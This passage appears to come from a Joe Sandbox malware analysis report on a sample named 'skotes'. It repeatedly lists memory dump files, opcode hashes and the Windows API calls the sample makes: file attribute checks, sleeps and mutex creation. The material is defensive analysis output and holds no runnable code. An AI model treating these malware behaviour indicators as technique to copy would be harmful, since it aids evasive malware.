                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 715d0b301ec3bdedf9140c934972f011f921ea25e72be51a6ed7dd27e98abe1c
                                                                                                                                                                                                                                          • Instruction ID: 3ce54d4339d6951a1e19249c114605eae9298993ed2999e1572caa167a21b4d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 715d0b301ec3bdedf9140c934972f011f921ea25e72be51a6ed7dd27e98abe1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A312A316041459BFB08DB6CDC8975DFBE2DBC6310F248699E028E73D2D77599808713
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A2E6
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 4ce88d98fbfd326d1ccdf091f6bea2ed4c82f6224df08b68dc69d67612e8bc1d
                                                                                                                                                                                                                                          • Instruction ID: a98d0abab40f3a5ac5ecab1108d790311c27da64a21862800ee3280813e03a6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ce88d98fbfd326d1ccdf091f6bea2ed4c82f6224df08b68dc69d67612e8bc1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D93127316041449BEB18EB6CDC8576CB7F2EBC6314F24C699E028972D5D77599808712
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A41B
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 4bb9e91bcfebf39c55388c735f7fec8d47a36a52c9f5ab87bae7249e6017b8f6
                                                                                                                                                                                                                                          • Instruction ID: 3503c3ef686c06deec275b37f773a40523210b2f87cec3243cfc7868dbf8107b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bb9e91bcfebf39c55388c735f7fec8d47a36a52c9f5ab87bae7249e6017b8f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D315B316041009BEB08EB7CD889B6DB7E1DBC2314F248699E068D73D5E7B699808753
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A550
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 9fb650fd0f09f349d48b33a4b817aa3c8f38d2a33e6f63b8b362d396f134a096
                                                                                                                                                                                                                                          • Instruction ID: 941648a90486ad79a1dc389960f962a7e39489da4434135e293692450b132572
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fb650fd0f09f349d48b33a4b817aa3c8f38d2a33e6f63b8b362d396f134a096
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3117316041058BEB08DB7CD8C9B6DB7E2EBC6714F248699E068D72D2DB75D9808713
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A685
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
